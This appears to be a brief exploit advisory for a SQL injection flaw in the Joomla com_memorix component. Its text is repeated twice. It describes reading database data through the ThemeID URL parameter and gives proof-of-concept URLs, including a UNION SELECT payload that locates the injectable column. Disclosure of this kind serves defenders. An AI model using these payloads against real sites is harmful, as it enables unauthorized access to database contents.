* 1. Description > Normal user can inject sql query in the url which lead to read data from the database. * 2. Proof of Concept > http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI) * Injected column is # 3 > http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222
* 1. Description > Normal user can inject sql query in the url which lead to read data from the database. * 2. Proof of Concept > http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI) * Injected column is # 3 > http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222